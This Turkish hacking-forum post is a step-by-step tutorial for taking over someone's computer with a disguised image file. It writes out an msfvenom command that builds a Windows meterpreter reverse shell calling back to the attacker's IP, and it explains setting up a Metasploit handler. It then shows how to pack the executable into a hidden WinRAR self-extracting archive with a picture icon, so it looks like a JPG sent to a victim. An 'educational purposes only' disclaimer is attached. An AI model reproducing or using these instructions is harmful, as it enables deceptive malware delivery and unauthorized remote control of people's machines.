Yeni Resim Dosyası İle Bİlgisayara Sızmak!

*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden...

View hidden content is available for registered users!

Önce msfvenom ile virüsü oluşturacağız daha sonra istediğimiz bir resim ile birleştirip hedef kişiye atacağız

Terminali açıp bu komutu yazın IP adresinizi öğrenmek için konsolo ifconfig yazabilirsiniz inet kısmında yazıyor.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<SİZİN IP ADRESİNİZ> LPORT=4444 -f exe > virus.exe

msfvenomvirüs.png

Evet virüsü oluşturduk dosyalarınızda virus.exe olarak aratıp bulun onu.Şimdi metasploite geçip multi/handle yapalım.
Yazdığım komutları aşağıdaki resimde olduğu gibi teker teker yazın.

Ye34Lz.png

Son komut olarakta run yazın.İşlemlerimize Windows üzerinden devam edeceğiz çünkü WinRar'ı kullanmamız gerekiyor fakat Bu terminalin açık kalması gerekiyor çünkü resmi hedef kişiye attığınızda sistemi buradan takip edeceğiz Sanal Makine kullandığınızı varsayıyorum ve windows'a geçiyorum.Ben dual boot olarak kullandığım için son aşamanın ekran görüntüsünü atamayacağım.

Evet şimdi bir resim seçin(.jpg).Bu resimi virus.exe ile birleştirip hedef kişiye resimi atacağız çünkü kandırma ihtimaliniz daha fazla.

Bu resmi(.jpg) .ico dosyasına çevirmeniz gerekiyor bu siteden yapabilirsiniz => SİTE çevirdikten sonra size verdiği .ico dosyasını indirin.

Evet ihtiyacımız olan 3 şeye sahibiz şimdi bunları birleştireceğiz

3dosya.jpg

jpeg ve virus dosyalarına sağ tıklayın ve arşive ekle diyin ayarları aşağıdaki gibi yapın.

1.jpg

2.jpg
Gelişmiş sekmesine gelip SFX Ayarları'a girin.

Genel kısmında Çıkartılacak yol kısmında bir disk seçin ama SAKIN C: DİSKİNİ SEÇMEYİN! D: diskini seçebilirsiniz

Şimdi KURULUM sekmesine gelin yukarıdan ve dosyaların ismini yazın görseldeki gibi:

5.jpg

Şimdi Metin Ve Simge sekmesine gelin ve aşağıdaki Dosyadan SFX simgesi yükle kısmına gelip .ico dosyasını seçin

Modlar => Tümünü gizle seçin

Güncelleme => Tüm Dosyaların Üzerine Yaz'ı işaretleyin.

Evet işlemlerimizi tamamladık şimdi birisine bu resmi attığınızda normal resim gibi açılacak fakat virüsümüz arkada çalışacak ve meterpreter oturumu açılacak şimdi Meterpreter'in desteklediği işlemleri yapabilirsiniz Aklınıza takılan bir soru veya hata yaptığım bir yer varsa yorumlarda belirtirseniz çok sevinirim iyi forumlar bye.

YAPACAĞINIZ İŞLEMLERDEN ŞAHSIM VE SPYHACKERZ.ORG SORUMLU DEĞİLDİR SADECE EĞİTİM AMAÇLI YAZILMIŞTIR!

Ekli dosyalar

• multihandler.png
    multihandler.png
    67.6 KB · Görüntüleme: 54
  • 6.jpg
    6.jpg
    29.4 KB · Görüntüleme: 53
  • 8.jpg
    8.jpg
    22 KB · Görüntüleme: 49
  • 9.jpg
    9.jpg
    22.7 KB · Görüntüleme: 47
  • 9.jpg
    9.jpg
    22.7 KB · Görüntüleme: 43
[Gizli içerik]
[Gizli içerik]

YAPACAĞINIZ İŞLEMLERDEN ŞAHSIM VE SPYHACKERZ.ORG SORUMLU DEĞİLDİR SADECE EĞİTİM AMAÇLI YAZILMIŞTIR!
benim merak ettiğim whatsapp için'de geçerli mi acaba zaten fotorafları otomatik galeriye indiriyor çoğu telefonda böyledir.
bilen varmı ?

• Like
Tepkiler: WyX
131,912Konular
3,272,577Mesajlar
316,532Kullanıcılar
Furkan aslanSon Üye
Üst Alt